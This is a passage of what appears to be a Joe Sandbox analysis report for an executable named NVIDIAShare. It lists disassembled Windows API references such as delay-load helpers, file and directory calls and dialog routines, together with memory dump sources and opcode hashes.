                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: c25cdcf0b3159602ebda62effb6f14a2bbc333c85f38c0c28afa335b3df1e3d5
                                                            • Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
                                                            • Opcode Fuzzy Hash: c25cdcf0b3159602ebda62effb6f14a2bbc333c85f38c0c28afa335b3df1e3d5
                                                            • Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E51F
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e8c931bcaffb5d7f31d46fe1db676df85e6d94d98e66364bea7a697f99d831e5
                                                            • Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
                                                            • Opcode Fuzzy Hash: e8c931bcaffb5d7f31d46fe1db676df85e6d94d98e66364bea7a697f99d831e5
                                                            • Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E51F
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 682026b8a93d750a6f76b4eb366f11d3b851e653df1877cd5c78e4b212d55cc0
                                                            • Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
                                                            • Opcode Fuzzy Hash: 682026b8a93d750a6f76b4eb366f11d3b851e653df1877cd5c78e4b212d55cc0
                                                            • Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E51F
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: b1941d85eb7029311e5374e4454da15176b6e4c6f080adbd8746da362472eebe
                                                            • Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
                                                            • Opcode Fuzzy Hash: b1941d85eb7029311e5374e4454da15176b6e4c6f080adbd8746da362472eebe
                                                            • Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E580
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: c3009052681cb4fe34ffedd3df419aed7df44978b7edfe149079594866819cf9
                                                            • Instruction ID: 89c26a5c292a286f63e2603ca45ee87d394c32d3c574eab7931c15f34ef57e62
                                                            • Opcode Fuzzy Hash: c3009052681cb4fe34ffedd3df419aed7df44978b7edfe149079594866819cf9
                                                            • Instruction Fuzzy Hash: 55A024C15D41013C31051171DD01C3F310CC5D0D11330411FFCC4D40447C441C010430
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E580
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: f1269bb9aea21e3fb017ae7978f8e658535360b9736b1d0bd60148697a477fce
                                                            • Instruction ID: 70260e9c02718b751d92c92482ac81e99fdcac753987d2acba6f751e5cbfa044
                                                            • Opcode Fuzzy Hash: f1269bb9aea21e3fb017ae7978f8e658535360b9736b1d0bd60148697a477fce
                                                            • Instruction Fuzzy Hash: ECA024C155C1037C31051151DD01C3F310CC5C4D10330441FFCC5C40447C441C010430
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E580
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 052e7c27bde04693a42f3ccfd863e322de2353411cb5fdb100c99cc7290fbe8f
                                                            • Instruction ID: 70260e9c02718b751d92c92482ac81e99fdcac753987d2acba6f751e5cbfa044
                                                            • Opcode Fuzzy Hash: 052e7c27bde04693a42f3ccfd863e322de2353411cb5fdb100c99cc7290fbe8f
                                                            • Instruction Fuzzy Hash: ECA024C155C1037C31051151DD01C3F310CC5C4D10330441FFCC5C40447C441C010430
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 7f986950e675d9268b2ff1ba1a43e13ed2dcf6b077fb993624ee12dd9de0f6b1
                                                            • Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
                                                            • Opcode Fuzzy Hash: 7f986950e675d9268b2ff1ba1a43e13ed2dcf6b077fb993624ee12dd9de0f6b1
                                                            • Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 0fca4b5a8eb2dadc990c60b72f38773de602d3ef6120de24d2fa20a74a24a50b
                                                            • Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
                                                            • Opcode Fuzzy Hash: 0fca4b5a8eb2dadc990c60b72f38773de602d3ef6120de24d2fa20a74a24a50b
                                                            • Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: b952171228d710f5548ca753f7af7b04102912a81dbb01e154d8fc2b5211550f
                                                            • Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
                                                            • Opcode Fuzzy Hash: b952171228d710f5548ca753f7af7b04102912a81dbb01e154d8fc2b5211550f
                                                            • Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 2316f976ebd558bfefc6c5d2b13a5a581e081a47cfd271eab90a06eb3742c35e
                                                            • Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
                                                            • Opcode Fuzzy Hash: 2316f976ebd558bfefc6c5d2b13a5a581e081a47cfd271eab90a06eb3742c35e
                                                            • Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: c97073bf6442b9f95dfadd859d926e23a7cf7704775c3323a65807a1dd2b7686
                                                            • Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
                                                            • Opcode Fuzzy Hash: c97073bf6442b9f95dfadd859d926e23a7cf7704775c3323a65807a1dd2b7686
                                                            • Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473
                                                            APIs
                                                            • SetEndOfFile.KERNELBASE(?,0100903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 01009F0C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: File
                                                            • String ID:
                                                            • API String ID: 749574446-0
                                                            • Opcode ID: fdca6560b5ee393511718fac952f18a8c81882639aae0eee3b767886141d7c7f
                                                            • Instruction ID: d7a11264a7f8f978e2f0d6a0396ae504948641953a674c100492c999eab91746
                                                            • Opcode Fuzzy Hash: fdca6560b5ee393511718fac952f18a8c81882639aae0eee3b767886141d7c7f
                                                            • Instruction Fuzzy Hash: 83A0243004400D47DD101730C71400C7710F7117C030001D47007CF051C71F4407CF00
                                                            APIs
                                                            • SetCurrentDirectoryW.KERNELBASE(?,0101AE72,C:\Users\user\Desktop,00000000,0104946A,00000006), ref: 0101AC08
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID:
                                                            • API String ID: 1611563598-0
                                                            • Opcode ID: 74b621d7e204367a8b53cc68256ab3adc079a597a2b0abbeb68be5432d713a69
                                                            • Instruction ID: 5b9290ba93f63bd00ba45889395ca824d03d5855e80da6fa2305b001c5dde865
                                                            • Opcode Fuzzy Hash: 74b621d7e204367a8b53cc68256ab3adc079a597a2b0abbeb68be5432d713a69
                                                            • Instruction Fuzzy Hash: 7FA011302002008B82000A328B8AA0EBAAABFA2B20F00C028A08088020CB3AC820AA00
                                                            APIs
                                                            • CloseHandle.KERNELBASE(000000FF,?,?,010095D6,?,?,?,?,?,01032641,000000FF), ref: 0100963B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: ef4ca47a0d06aa223ec60324e11d54b951d612392cf1208fd3d27fbb49532fb2
                                                            • Instruction ID: b699d0f0767de549242a4d9c844c35bdcdb06aac75e9b6efa8171ecaf4f36f53
                                                            • Opcode Fuzzy Hash: ef4ca47a0d06aa223ec60324e11d54b951d612392cf1208fd3d27fbb49532fb2
                                                            • Instruction Fuzzy Hash: 54F089704C1B159FFB328A68C898792B7E86B16325F041B5ED0EA429E1D775618DCB40
                                                            APIs
                                                              • Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
                                                              • Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0101C2B1
                                                            • EndDialog.USER32(?,00000006), ref: 0101C2C4
                                                            • GetDlgItem.USER32(?,0000006C), ref: 0101C2E0
                                                            • SetFocus.USER32(00000000), ref: 0101C2E7
                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 0101C321
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0101C358
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0101C36E
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0101C38C
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0101C39C
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0101C3B8
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0101C3D4
                                                            • _swprintf.LIBCMT ref: 0101C404
                                                              • Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5
                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0101C417
                                                            • FindClose.KERNEL32(00000000), ref: 0101C41E
